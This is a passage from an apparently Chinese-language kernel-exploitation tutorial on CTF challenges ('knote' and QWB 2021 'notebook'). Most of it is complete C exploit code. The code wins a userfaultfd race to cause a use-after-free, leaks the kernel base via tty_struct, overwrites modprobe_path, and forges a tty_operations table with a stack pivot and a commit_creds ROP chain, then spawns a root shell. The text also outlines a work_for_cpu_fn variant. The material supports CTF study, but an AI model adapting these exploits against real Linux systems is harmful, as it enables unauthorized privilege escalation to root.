        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        /* src/dst are integer fields; %p requires a pointer argument. */
        printf("[*] uffdio_copy.src: %p\n", (void *) (uintptr_t) uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", (void *) (uintptr_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

/*
 * userfaultfd handler for the use-after-free stage.
 *
 * arg  the userfaultfd descriptor, passed through the void * argument.
 *
 * When the monitored buffer faults, note 0 is deleted and the modprobe_path
 * address is placed in the first 8 bytes of the staging page; the page is
 * then installed, so the stalled system call resumes reading that value from
 * the user buffer. Loops forever; any failure terminates the process.
 *
 * NOTE(review): declared void although it is started through pthread_create
 * via a cast; it never returns, so no return value is ever consumed.
 */
void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        /* Race payload: runs while the faulting thread is still blocked. */
        chunk_del(0);
        memcpy(page, &modprobe_path, 8);

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        /* src/dst are integer fields; %p requires a pointer argument. */
        printf("[*] uffdio_copy.src: %p\n", (void *) (uintptr_t) uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", (void *) (uintptr_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

/*
 * knote exploit, handler-driven variant.
 *
 * Stage 1 (skipped when /offset already caches the result): chunk_get() on a
 * userfaultfd-monitored buffer lets leak_thread swap the note underneath the
 * copy; qword 86 of the data read back yields the kernel offset.
 * Stage 2: chunk_edit() on another monitored buffer lets uaf_thread free the
 * note and supply the modprobe_path address as the data being written; two
 * further allocations are made and "/shell.sh" is written through the second
 * one, then an unrecognised executable is run and /flag is probed.
 */
int main() {
    bind_core(0);
    page_size = getpagesize();
    page = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }

    knote_fd = open("/dev/knote", O_RDWR);
    if (knote_fd < 0) {
        puts("[-] Failed to open knote.");
        exit(-1);
    }

    FILE *offset_fd = fopen("/offset", "r");
    size_t kernel_offset = 0;
    if (offset_fd != NULL) {
        /* Read through unsigned long long so the target matches %llx. */
        unsigned long long cached = 0;
        if (fscanf(offset_fd, "%llx", &cached) != 1) {
            puts("[-] Malformed /offset");
            exit(-1);
        }
        fclose(offset_fd);
        kernel_offset = (size_t) cached;
    } else {
        char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (buf == MAP_FAILED) {
            puts("[-] Error at: mmap");
            exit(-1);
        }
        register_userfaultfd(buf, page_size, (void *) leak_thread);
        chunk_add(TTY_STRUCT_SIZE);
        chunk_get(0, buf);
        qword_dump("leak tty_struct",buf,TTY_STRUCT_SIZE);
        /* A merely non-zero value is not enough: require a plausible kernel
         * address before deriving (and caching) an offset from it. */
        if (is_kernel_text_addr(((size_t *) buf)[86])) {
            puts("[+] Successfully hit the tty_struct.");
            kernel_offset = ((size_t *) buf)[86] - 0xffffffff815d4ef0;
            offset_fd = fopen("/offset", "w");
            if (offset_fd != NULL) {
                fprintf(offset_fd, "%llx", (unsigned long long) kernel_offset);
                fclose(offset_fd);
            } else {
                puts("[-] Could not write /offset");
            }
        } else {
            puts("[-] Failed to hit the tty struct.");
            exit(-1);
        }
    }
    modprobe_path += kernel_offset;
    printf("[*] kernel offset: %p\n", (void *) kernel_offset);
    printf("[*] modprobe_path: %p\n", (void *) modprobe_path);

    chunk_add(0x100);
    char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    register_userfaultfd(buf, page_size, (void *) uaf_thread);
    chunk_edit(0, buf);
    chunk_add(0x100);
    chunk_add(0x100);
    chunk_edit(1, "/shell.sh");
    int probe_fd = open("/shell.sh", O_RDWR);
    if (probe_fd < 0) {
        system("echo '#!/bin/sh' >> /shell.sh");
        system("echo 'chmod 777 /flag' >> /shell.sh");
        system("chmod +x /shell.sh");
    } else {
        close(probe_fd);
    }
    system("echo -e '\\xff\\xff\\xff\\xff' > /fake");
    system("chmod +x /fake");
    system("/fake");
    probe_fd = open("/flag", O_RDWR);
    if (probe_fd < 0) {
        puts("[-] Failed to hijack!");
        _exit(-1);
    }
    close(probe_fd);
    puts("[+] hijack success");
    system("/bin/sh");

    return 0;
}

例题：强网杯2021 notebook

附件下载链接
题目中的 notedel 加了写锁，noteadd，noteedit 加了读锁。读锁可以被多个进程使用，多个进程此时可以同时进入临界区，而写锁只能被一个进程使用，只有一个进程能够进入临界区，因此只能考虑读锁的功能。

noteedit 函数功能如下：

/*
 * Decompiler output for the driver's edit handler.
 *
 * Under the read lock it stores newsize into the note, calls krealloc on the
 * note's buffer, copies 0x100 bytes from user space into `name`, and only
 * afterwards stores the krealloc result back into note->note.
 * Return values seen below: -1 bad index, 1 size unchanged, 0 note->size is
 * zero after the copy, 2 pointer updated, 3 krealloc result rejected.
 */
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
  __int64 v3; // rdx
  __int64 v4; // r13
  note *note; // rbx
  size_t size; // rax
  __int64 v7; // r12
  __int64 v8; // rbx

  _fentry__(idx);
  if ( idx > 0xF )
  {
    v8 = -1LL;
    printk("[x] Edit idx out of range.\n", newsize);
    return v8;
  }
  // NOTE(review): v3 is never assigned in this listing; it is annotated as
  // rdx, so v4 presumably holds the third argument (buf) — confirm.
  v4 = v3;
  note = &notebook[idx];
  raw_read_lock(&lock);
  size = note->size;
  // The new size is recorded before any reallocation happens.
  note->size = newsize;
  if ( size == newsize )
  {
    v8 = 1LL;
    goto editout;
  }
  v7 = krealloc(note->note, newsize, 0x24000C0LL);
  // User-space access between krealloc and the pointer update below; until
  // that update note->note still holds the pre-krealloc pointer.
  copy_from_user(name, v4, 0x100LL);
  if ( !note->size )
  {
    printk("free in fact");
    note->note = 0LL;
    v8 = 0LL;
    goto editout;
  }
  if ( (unsigned __int8)_virt_addr_valid(v7) )
  {
    note->note = (void *)v7;
    v8 = 2LL;
editout:
    raw_read_unlock(&lock);
    printk("[o] Edit success. %s edit a note.\n", name);
    return v8;
  }
  // krealloc result failed the address check: note->note is left unchanged.
  printk("[x] Return ptr unvalid.\n");
  raw_read_unlock(&lock);
  return 3LL;
}

可以看到 noteedit 实际上是利用 krealloc 改变 note 的大小。krealloc 有如下特性：

krealloc 的 new_size<ks ，则指针不变，仅调整kasan监控的区域。
krealloc 的 new_size>ks ，则 kfree 释放原本 object ，kmalloc 重新申请新 object 。

由于 noteedit 是先 krealloc 再 copy_from_user 最后才更新 note 指针，因此可以考虑利用 userfaultfd 将执行流卡在 copy_from_user 处，此时 note 指针仍指向已被释放的 object，从而实现 UAF 。

在利用 noteedit 释放 object 后可以大量申请 tty_struct 来泄露内核基址。由于 notegift 可以泄露 object 地址，因此可以伪造 tty_operations 来劫持内核执行流程。

劫持内核执行流程后有 ROP 和 work_for_cpu_fn 两种方法提权。

ROP 方式是在 tty_operations 中写入如下 gadget，由于调用 tty_operations 中的函数时会传入 tty_struct 结构体地址，因此可以将栈迁移至 tty_struct 。

.text:FFFFFFFF81238D50 push    rdi
.text:FFFFFFFF81238D51 pop     rsp
.text:FFFFFFFF81238D52 pop     rbp
.text:FFFFFFFF81238D53 add     rax, rdx
.text:FFFFFFFF81238D56 retn

为了不破坏 tty_struct 结构，不能在 tty_struct 中布置完整的 rop ，而是在 tty_struct 对应位置写入 pop rsp; ret gadget 将栈迁移至一个 note 中，在 note 中写入 rop 完成提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Print a buffer as rows of four 64-bit words followed by an ASCII column.
 *
 * desc  optional heading printed first; skipped when NULL
 * addr  start of the buffer
 * len   buffer size in bytes; only whole 8-byte words get a hex column
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *words = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int nwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < nwords; row += 4) {
        const int row_off = row * 8; /* byte offset of this row */

        printf("  %04x", row_off);
        for (int col = 0; col < 4; col++) {
            if (row + col < nwords) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                /* blank cell keeps the ASCII column aligned on a short row */
                printf("                   ");
            }
        }
        printf("   ");
        for (int k = 0; k < 32 && row_off + k < len; k++) {
            const uint8_t ch = bytes[row_off + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/* Size note 0 is resized to before the race, so it matches a tty_struct. */
const int TTY_STRUCT_SIZE = 0x2E0;
/* Number of /dev/ptmx descriptors opened by the fault handler. */
const int PTMX_NUM = 100;
/* Un-slid addresses for the target kernel; the handler adds the leaked offset
 * to every one of them at runtime. */
size_t commit_creds = 0xFFFFFFFF810A9B40;
size_t init_cred = 0xFFFFFFFF8225C940;
/* NOTE(review): despite the name, the listing at this address in the
 * accompanying text is "push rdi; pop rsp; pop rbp; add rax, rdx; retn". */
size_t mov_rsp_rdi_ret = 0xffffffff81238d50;
size_t pop_rdi_ret = 0xffffffff81007115;
size_t pop_rsp_ret = 0xffffffff810bc110;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A00929;


/*
 * User-space mirror of the kernel's tty operations table, used only to get
 * the size and slot order right when building a fake table: 30 function
 * pointers followed by one data pointer. Member order must not change.
 */
struct tty_operations {
    /* driver-level hooks */
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);
    int (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    /* open / close / teardown */
    int (*open)(struct tty_struct *tty, struct file *filp);
    void (*close)(struct tty_struct *tty, struct file *filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    /* output path */
    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);
    int (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int (*write_room)(struct tty_struct *tty);
    int (*chars_in_buffer)(struct tty_struct *tty);
    /* control requests (slot 12 is ioctl) */
    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);
    /* flow control */
    void (*throttle)(struct tty_struct *tty);
    void (*unthrottle)(struct tty_struct *tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    /* modem lines, window size, misc */
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);
    /* trailing data pointer */
    const struct file_operations *proc_fops;
};

/* Landing point placed in the ROP chain's return frame: spawns a shell. */
void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs / user_ss / user_sp / user_rflags so they can be placed in the
 * return frame at the end of the ROP chain.
 *
 * NOTE(review): the operands are written destination-first (Intel syntax),
 * so this presumably has to be built with -masm=intel — confirm.
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"               /* rflags has no direct mov: go via the stack */
            "pop user_rflags;");
    puts("[*] status has been saved.");
}


/*
 * Pin the calling process to a single CPU.
 *
 * core  index of the CPU to run on.
 *
 * Failure is reported but not fatal: the caller continues unpinned.
 * NOTE(review): pinning is presumably wanted so that the free and the
 * following allocation are served by the same per-CPU cache — confirm.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) == -1) {
        perror("[-] sched_setaffinity");
    }
}

size_t *page;
long page_size;

/*
 * Create a userfaultfd, register [addr, addr + len) on it for missing-page
 * faults and start `handler` in a new thread with the descriptor as argument.
 *
 * addr     start of the range to monitor
 * len      length of the range in bytes
 * handler  thread routine that will service the faults
 *
 * Any failure prints a message and terminates the process.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    struct uffdio_api api_req = {.api=UFFD_API, .features=0};
    struct uffdio_register reg_req;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }

    if (ioctl(uffd, UFFDIO_API, &api_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg_req.range.len = len;
    reg_req.range.start = (size_t) addr;
    if (ioctl(uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

/* Argument block passed by pointer to every notebook ioctl. */
struct Note {
    size_t index; /* note slot the request refers to */
    size_t size;  /* requested size (add / edit) */
    char *buf;    /* user buffer handed to the driver */
};

int note_fd; /* descriptor of /dev/notebook, opened in main() */

void note_add(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x100, &(struct Note) {index, size, buf});
}

void note_del(size_t index) {
    ioctl(note_fd, 0x200, &(struct Note) {.index=index});
}

void note_edit(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x300, &(struct Note) {index, size, buf});
}

void note_gift(void *buf) {
    ioctl(note_fd, 100, &(struct Note) {.buf=buf});
}

/*
 * read() on the notebook device. `index` is passed in read()'s count slot.
 * NOTE(review): presumably the driver interprets that argument as the note
 * index rather than a byte count — confirm against the driver.
 */
size_t note_read(int index, void *buf) {
    ssize_t rc = read(note_fd, buf, index);
    return rc;
}

/*
 * write() on the notebook device. `index` is passed in write()'s count slot.
 * NOTE(review): presumably the driver interprets that argument as the note
 * index rather than a byte count — confirm against the driver.
 */
size_t note_write(int index, void *buf) {
    ssize_t rc = write(note_fd, buf, index);
    return rc;
}

/*
 * userfaultfd handler that carries the whole notebook exploit.
 *
 * arg  the userfaultfd descriptor, passed through the void * argument.
 *
 * Runs while main()'s note_edit() is stalled on the monitored buffer:
 *   1. open PTMX_NUM ptmx devices, then read note 0 back and dump it;
 *   2. derive the kernel offset from qword 3 of that data and slide all
 *      gadget/symbol addresses;
 *   3. store a fake operations table (every slot = stack-pivot gadget)
 *      followed by the ROP chain in note 1;
 *   4. obtain the note addresses via note_gift(), then overwrite qwords 1-3
 *      of note 0 so that the pivot continues into the chain;
 *   5. call ioctl() on every ptmx descriptor to trigger the fake table.
 * The pending fault is resolved only after all of that.
 *
 * NOTE(review): declared void although it is started through pthread_create
 * via a cast; it never returns, so no return value is ever consumed.
 */
void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        /* Step 1: spray ptmx opens, then read note 0 back. */
        int ptmx_fd[PTMX_NUM];
        for (int i = 0; i < PTMX_NUM; i++) {
            ptmx_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        }
        note_edit(0, 1024, page);
        note_read(0, page);
        qword_dump("leak tty_struct", page, 1024);

        /* Step 2: slide every address by the leaked offset.
         * NOTE(review): 0xffffffff81e8e440 is presumably the un-slid value
         * expected in qword 3 (the ops pointer) — confirm for the target. */
        size_t offset = page[3] - 0xffffffff81e8e440;
        commit_creds += offset;
        init_cred += offset;
        mov_rsp_rdi_ret += offset;
        pop_rdi_ret += offset;
        pop_rsp_ret += offset;
        swapgs_restore_regs_and_return_to_usermode += offset;

        /* Step 3: fake table with the pivot gadget in every slot. */
        struct tty_operations tty_ops;
        for (size_t i = 0; i < sizeof(tty_ops) / sizeof(size_t); i++) {
            ((size_t *) &tty_ops)[i] = mov_rsp_rdi_ret;
        }

        size_t rop[] = {
                pop_rdi_ret,
                init_cred,
                commit_creds,
                swapgs_restore_regs_and_return_to_usermode + 0x16,
                0,
                0,
                (size_t) get_shell,
                user_cs,
                user_rflags,
                user_sp,
                user_ss
        };

        /* Table and chain are laid out back to back in one note. */
        const size_t buf_size = sizeof(tty_ops) + sizeof(rop);
        char buf[sizeof(tty_ops) + sizeof(rop)];
        memcpy(buf, &tty_ops, sizeof(tty_ops));
        memcpy(buf + sizeof(tty_ops), rop, sizeof(rop));

        note_add(1, 0x50, page);
        note_edit(1, buf_size, page);
        note_write(1, buf);

        /* Step 4: learn where the notes live, then patch note 0. */
        size_t notebook[32];
        note_gift(notebook);
        qword_dump("notebook", notebook, 32 * 8);
        size_t tty_ops_addr = notebook[2];
        size_t rop_addr = tty_ops_addr + sizeof(struct tty_operations);
        size_t tty_struct_addr = notebook[0];
        /* These are integers; %p requires a pointer argument. */
        printf("[*] tty_ops addr: %p\n", (void *) tty_ops_addr);
        printf("[*] tty_struct addr: %p\n", (void *) tty_struct_addr);
        printf("[*] rop addr: %p\n", (void *) rop_addr);

        page[1] = pop_rsp_ret;
        page[2] = rop_addr;
        page[3] = tty_ops_addr;
        note_write(0, page);

        /* Step 5: any ioctl on the sprayed descriptors goes through the table. */
        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", (void *) (uintptr_t) uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", (void *) (uintptr_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

/*
 * Entry point of the notebook exploit.
 *
 * Sets up the shared scratch page, opens the notebook device, prepares
 * note 0 at TTY_STRUCT_SIZE, and finally issues a note_edit whose user
 * buffer lives in a userfaultfd-registered mapping so that uaf_thread is
 * invoked while that ioctl is in flight.
 */
int main() {
    const int prot = PROT_READ | PROT_WRITE;
    const int flags = MAP_PRIVATE | MAP_ANONYMOUS;

    save_status();
    bind_core(0);

    /* Scratch page shared with the fault handler through the global `page`. */
    page_size = getpagesize();
    page = (size_t *) mmap(NULL, page_size, prot, flags, -1, 0);
    memset(page, 0, page_size);

    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        puts("[-] Failed to open notebook.");
        exit(-1);
    }

    /* Create note 0, then resize it to TTY_STRUCT_SIZE. */
    note_add(0, 0x50, page);
    note_edit(0, TTY_STRUCT_SIZE, page);

    /*
     * Never-touched mapping watched by userfaultfd. Presumably the driver's
     * copy from this buffer is what raises the fault serviced by uaf_thread
     * -- confirm against the driver.
     */
    char *fault_buf = (char *) mmap(NULL, page_size, prot, flags, -1, 0);
    register_userfaultfd(fault_buf, page_size, (void *) uaf_thread);
    note_edit(0, 0x2000, fault_buf);

    return 0;
}

在开启了多核支持的内核中都有 work_for_cpu_fn 这个函数。

/* Work item that carries a callback, its argument and its result. */
struct work_for_cpu {
    struct work_struct work; /* embedded work item; container_of() recovers the wrapper from it */
    long (*fn)(void *);      /* callback invoked by work_for_cpu_fn */
    void *arg;               /* argument passed to fn */
    long ret;                /* return value of fn(arg), stored by work_for_cpu_fn */
};

/*
 * Recover the enclosing work_for_cpu from its embedded work_struct, call
 * fn(arg) and store the result in ret.
 */
static void work_for_cpu_fn(struct work_struct *work)
{
    struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work);

    wfc->ret = wfc->fn(wfc->arg);
}

在 IDA 中 work_for_cpu_fn 这个函数内容如下：

/*
 * Decompiled view of work_for_cpu_fn with the argument treated as an array
 * of 8-byte words. Compared with the source version, args[4] is fn,
 * args[5] is arg and args[6] is ret.
 */
void __fastcall work_for_cpu_fn(size_t *args)
{
  _fentry__(args); /* presumably the compiler-inserted function-entry hook -- not part of the logic */
  args[6] = ((__int64 (__fastcall *)(size_t))args[4])(args[5]);
}

因此只需要在 tty_operations 中写入 work_for_cpu_fn 函数指针，利用调用 tty_operations 中的函数时会传入 tty_struct 结构体地址这个特性在 tty_struct 对应位置写入要执行的函数和参数实现提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Hex-dump a buffer as rows of up to four 64-bit words, each row followed by
 * the same bytes rendered as characters ('.' for non-printable ones).
 *
 * desc: optional heading printed as "[*] <desc>:"; skipped when NULL.
 * addr: start of the buffer to dump.
 * len:  number of bytes; only the len / 8 complete words produce rows.
 */
void qword_dump(char *desc, void *addr, int len) {
    uint64_t *words = (uint64_t *) addr;
    uint8_t *bytes = (uint8_t *) addr;
    int nwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }

    for (int row = 0; row < nwords; row += 4) {
        int row_off = row * 8;

        /* Byte offset of the row. */
        printf("  %04x", row_off);

        /* Four word columns; missing words are padded with blanks. */
        for (int col = 0; col < 4; col++) {
            if (row + col < nwords) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                printf("                   ");
            }
        }

        printf("   ");

        /* Character rendering of up to 32 bytes belonging to this row. */
        for (int k = 0; k < 32; k++) {
            if (row_off + k >= len) {
                break;
            }
            uint8_t ch = bytes[row_off + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/* Size that note 0 is resized to before the race (see main). */
const int TTY_STRUCT_SIZE = 0x2E0;
/* Number of /dev/ptmx descriptors opened by uaf_thread. */
const int PTMX_NUM = 100;
/*
 * Kernel addresses before relocation; uaf_thread adds the computed `offset`
 * to each of them before use. Presumably taken from the challenge's
 * vmlinux -- verify against the target kernel.
 */
size_t commit_creds = 0xFFFFFFFF810A9B40;
size_t prepare_kernel_cred = 0xFFFFFFFF810A9EF0;
size_t init_cred = 0xFFFFFFFF8225C940;
size_t work_for_cpu_fn = 0xFFFFFFFF8109EB90;

/*
 * Userspace replica of a table of tty callback pointers.
 *
 * The exploit never calls through these members; uaf_thread only uses
 * sizeof(struct tty_operations) and fills every pointer-sized slot with the
 * same address. The member list presumably mirrors the target kernel's
 * struct tty_operations so that the size matches -- verify against the
 * kernel version in use.
 */
struct tty_operations {
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);

    int (*install)(struct tty_driver *driver, struct tty_struct *tty);

    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);

    int (*open)(struct tty_struct *tty, struct file *filp);

    void (*close)(struct tty_struct *tty, struct file *filp);

    void (*shutdown)(struct tty_struct *tty);

    void (*cleanup)(struct tty_struct *tty);

    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);

    int (*put_char)(struct tty_struct *tty, unsigned char ch);

    void (*flush_chars)(struct tty_struct *tty);

    int (*write_room)(struct tty_struct *tty);

    int (*chars_in_buffer)(struct tty_struct *tty);

    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);

    void (*throttle)(struct tty_struct *tty);

    void (*unthrottle)(struct tty_struct *tty);

    void (*stop)(struct tty_struct *tty);

    void (*start)(struct tty_struct *tty);

    void (*hangup)(struct tty_struct *tty);

    int (*break_ctl)(struct tty_struct *tty, int state);

    void (*flush_buffer)(struct tty_struct *tty);

    void (*set_ldisc)(struct tty_struct *tty);

    void (*wait_until_sent)(struct tty_struct *tty, int timeout);

    void (*send_xchar)(struct tty_struct *tty, char ch);

    int (*tiocmget)(struct tty_struct *tty);

    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);

    int (*resize)(struct tty_struct *tty, struct winsize *ws);

    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);

    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);

    const struct file_operations *proc_fops;
};

/*
 * Restrict the CPU affinity of this process to the single CPU `core`.
 * The result of sched_setaffinity is not checked.
 */
void bind_core(int core) {
    cpu_set_t only_core;

    CPU_ZERO(&only_core);
    CPU_SET(core, &only_core);

    sched_setaffinity(getpid(), sizeof only_core, &only_core);
}

/* Scratch page mapped in main; used by uaf_thread for note I/O and as the UFFDIO_COPY source. */
size_t *page;
/* System page size as returned by getpagesize() in main. */
long page_size;

/*
 * Create a userfaultfd, register [addr, addr + len) for missing-page faults
 * and start `handler` in a new thread.
 *
 * addr, len: range to watch.
 * handler:   thread routine; it receives the userfaultfd descriptor cast to
 *            void *.
 *
 * Any failing step prints a message and terminates the process. The thread
 * handle is kept in static storage and is never joined here.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    int rc;

    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }

    /* API handshake must precede any other userfaultfd ioctl. */
    struct uffdio_api api_req = {.api=UFFD_API, .features=0};
    rc = ioctl(uffd, UFFDIO_API, &api_req);
    if (rc == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    struct uffdio_register reg_req;
    reg_req.range.start = (size_t) addr;
    reg_req.range.len = len;
    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    rc = ioctl(uffd, UFFDIO_REGISTER, &reg_req);
    if (rc == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    rc = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (rc != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

/* Request record passed by pointer to every notebook ioctl below. */
struct Note {
    size_t index; /* note slot the request refers to */
    size_t size;  /* requested size (add / edit) */
    char *buf;    /* user buffer handed to the driver */
};

/* Descriptor of /dev/notebook, opened in main. */
int note_fd;

void note_add(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x100, &(struct Note) {index, size, buf});
}

void note_del(size_t index) {
    ioctl(note_fd, 0x200, &(struct Note) {.index=index});
}

void note_edit(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x300, &(struct Note) {index, size, buf});
}

void note_gift(void *buf) {
    ioctl(note_fd, 100, &(struct Note) {.buf=buf});
}

/*
 * read() on the notebook device. The note index is passed in the position
